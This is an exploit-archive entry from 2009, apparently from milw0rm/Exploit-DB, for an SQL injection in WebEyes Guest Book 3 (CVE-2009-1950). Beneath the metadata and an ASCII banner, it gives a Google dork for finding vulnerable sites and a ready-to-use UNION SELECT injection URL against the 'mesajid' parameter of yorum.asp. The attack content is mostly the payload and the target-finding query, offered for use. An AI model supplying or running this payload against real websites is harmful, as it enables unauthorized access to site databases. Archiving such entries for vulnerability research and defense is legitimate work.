WebEyes Guest Book 3 - 'yorum.asp?mesajid' SQL Injection
Author: Bl@ckbe@rD
type: webapps
platform: asp
port:
date_added: 2009-06-01
date_updated:
verified: 1
codes: OSVDB-54867;CVE-2009-1950
tags:
aliases:
screenshot_url:
application_url:
000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0
0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000
(
[+] Script : WEBEYES GUEST BOOK v.3
[+] Exploit Type : Remote sql injection exploit
[+] Google Dork : intitle:WEBEYES GUEST BOOK inurl:.asp?id=
[+] Contact : blackbeard-sql A.T hotmail.fr
--//--> Exploit :
Remote sql injection Exploit :
http://[website]/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjects
[peace xD]
# milw0rm.com [2009-06-02]